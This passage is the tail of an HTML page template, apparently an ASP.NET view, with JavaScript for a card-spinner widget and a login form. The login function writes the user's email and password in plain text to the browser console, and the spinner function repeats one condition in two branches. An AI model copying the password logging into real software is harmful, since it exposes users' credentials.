                            dotsContainer.setAttribute("data-previousStep", horizontal);
                        }

                    }


                }
            }
        }

        //updating  cardSpinner
        function cardSpinnerUpdate(vertical, horizontal, element) {

            var columncount = document.getElementsByClassName("column");
            var elemParentId = element.parentElement.children[0].id;

            vertical = Math.round(vertical);

            for (var count = 0; count < columncount.length; count++) {

                if (elemParentId == columncount[count].children[1].children[0].id) {
                    columncount[count].children[1].children[0].value = element.children[vertical].id;
                } else if (elemParentId == columncount[count].children[1].children[0].id) {
                    columncount[count].children[1].children[0].value = element.children[vertical].id;
                }
            }
        }

    </script>


    <script>
        submit = function(){
            var form = document.getElementById("formContents1");
            var email = document.getElementById("email").value;
            var password = document.getElementById("password").value;
            console.log("email",email);
            console.log("password",password);
            if(email==""||password==""){
                alert("enter email and password");
                return;
            } else{
                form.submit();
                console.log('submit');
            }
        }
        </script>



</body>
</html>

@RenderBody()